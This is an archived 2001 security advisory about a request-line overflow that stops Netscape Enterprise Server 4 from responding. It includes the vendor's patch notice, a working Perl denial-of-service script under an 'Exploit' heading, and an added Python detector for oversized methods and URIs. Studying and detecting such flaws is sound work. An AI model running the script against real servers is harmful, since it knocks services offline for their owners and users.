Netscape Enterprise Server 4 Method and URI overflow

by phiber on May 20th, 2001

Sending an invalid method or URI request of 4022 bytes causes Netscape Enterprise Server to stop responding to requests.


Vendor's Response:

The security & stability of iPlanet's customers' environments is one of our paramount concerns. To ensure the stability of our customers' environments iPlanet has made available an NSAPI patch that can be applied to iPlanet Web Server, Enterprise Edition version 4.1 Service Packs 3 through 7. The NSAPI patch is available at:

http://www.iplanet.com/products/iplanet_web_enterprise/iwsalert5.11.html.
This issue will also be addressed by the release of iPlanet Web Server, Enterprise Edition version 4.1 Service Pack 8.


Exploit


#!/usr/bin/perl
# Sends a request with an oversized method token twice, 15 seconds apart.
use IO::Socket;
if (@ARGV < 2) {
    print "Usage: host port\n";
    exit;
}
# 4022-byte string sent in place of the HTTP method
$overflow = "A" x 4022;
&connect;
sleep(15);
&connect;
exit;
################################################
sub connect() {
    $sock = IO::Socket::INET->new(Proto=>"TCP",
                                  PeerAddr=>$ARGV[0],
                                  PeerPort=>"$ARGV[1]",)
        or die "Cant connect to $ARGV[0]: $!\n";
    $sock->autoflush(1);
    # Request line carrying the oversized method
    print $sock "$overflow /index.html HTTP/1.0\n\n";
    # Print whatever the server sends back
    $response = <$sock>;
    print "$response";
    while (<$sock>) {
        print "$_\n";
    }
    close $sock;
}



This vulnerability was posted on a bt mailing list by Robert Cardona
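
Detection sketch for the request shape described above (an oversized or invalid method, or an oversized URI). This is an added example, not part of the original post or of iPlanet's patch; the length limits, function names and sample requests are assumptions constructed for illustration.

```python
"""Flag HTTP request lines with an oversized or unknown method or an oversized URI."""

# Assumed limits; tune to what the application legitimately needs.
MAX_METHOD_LEN = 16
MAX_URI_LEN = 2048
KNOWN_METHODS = {b"GET", b"HEAD", b"POST", b"PUT", b"DELETE", b"OPTIONS", b"TRACE", b"CONNECT"}


def inspect_request_line(raw: bytes) -> list[str]:
    """Return a list of findings for the first line of a raw HTTP request."""
    line = raw.split(b"\n", 1)[0].rstrip(b"\r")
    parts = line.split(b" ")
    if len(parts) != 3:
        return [f"malformed request line ({len(line)} bytes)"]
    method, uri, version = parts
    findings = []
    if len(method) > MAX_METHOD_LEN:
        findings.append(f"oversized method ({len(method)} bytes)")
    elif method not in KNOWN_METHODS:
        findings.append("unknown method")
    if len(uri) > MAX_URI_LEN:
        findings.append(f"oversized URI ({len(uri)} bytes)")
    if not version.startswith(b"HTTP/"):
        findings.append("bad protocol version")
    return findings


def scan(requests: dict[str, bytes]) -> dict[str, list[str]]:
    """Inspect labelled raw requests; return only those with findings."""
    results = {}
    for label, raw in requests.items():
        findings = inspect_request_line(raw)
        if findings:
            results[label] = findings
    return results


# Constructed sample requests (not captured traffic).
SAMPLES = {
    "normal": b"GET /index.html HTTP/1.0\r\n\r\n",
    "long-method": b"A" * 4022 + b" /index.html HTTP/1.0\n\n",
    "long-uri": b"GET /" + b"A" * 4022 + b" HTTP/1.0\r\n\r\n",
    "no-version": b"GET /index.html\r\n\r\n",
}

if __name__ == "__main__":
    for label, findings in scan(SAMPLES).items():
        print(f"{label}: {', '.join(findings)}")
```

The same limits can be enforced at a proxy in front of an unpatched server, so that oversized request lines are rejected before they reach it.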